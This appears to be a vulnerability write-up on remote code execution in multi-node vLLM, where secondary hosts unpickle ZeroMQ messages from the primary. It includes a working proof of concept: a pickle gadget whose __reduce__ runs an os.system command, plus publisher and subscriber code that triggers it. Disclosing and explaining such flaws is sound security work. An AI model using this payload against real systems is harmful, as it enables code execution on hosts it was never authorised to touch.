In a multi-node vLLM deployment, secondary hosts connect to the primary vLLM host via a ZeroMQ SUB socket. Messages received on this socket are deserialized with Python's pickle module, which executes arbitrary code when handed attacker-controlled data. An attacker who compromises the primary vLLM host can therefore publish malicious payloads to the connected secondary hosts, achieving remote code execution across the cluster. This poses a significant risk in distributed environments where vLLM is used for large-scale AI inference.
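
The underlying problem is generic to unpickling data from an untrusted transport. The sketch below is illustrative only, not vLLM's actual code: the class, function names, endpoints, and port are hypothetical, and it assumes `pyzmq` is installed. It shows how a crafted object's `__reduce__` method runs an attacker-chosen command the moment the subscriber calls `pickle.loads()`.

```python
import pickle
import zmq


class MaliciousPayload:
    """Crafted object: unpickling it invokes os.system with an attacker command."""
    def __reduce__(self):
        import os
        # Any command the attacker chooses runs on the host that unpickles this.
        return (os.system, ("id > /tmp/pwned",))


def compromised_primary(endpoint: str = "tcp://*:5555") -> None:
    """Hypothetical compromised primary host publishing a crafted message."""
    ctx = zmq.Context()
    pub = ctx.socket(zmq.PUB)
    pub.bind(endpoint)
    pub.send(pickle.dumps(MaliciousPayload()))


def secondary_subscriber(endpoint: str = "tcp://primary-host:5555") -> None:
    """Hypothetical secondary host: deserializing the message executes the payload."""
    ctx = zmq.Context()
    sub = ctx.socket(zmq.SUB)
    sub.connect(endpoint)
    sub.setsockopt(zmq.SUBSCRIBE, b"")
    data = sub.recv()
    pickle.loads(data)  # arbitrary code execution happens here
```

Because `pickle.loads()` reconstructs objects by calling whatever callable the payload specifies, no further interaction is needed once the secondary host receives the message.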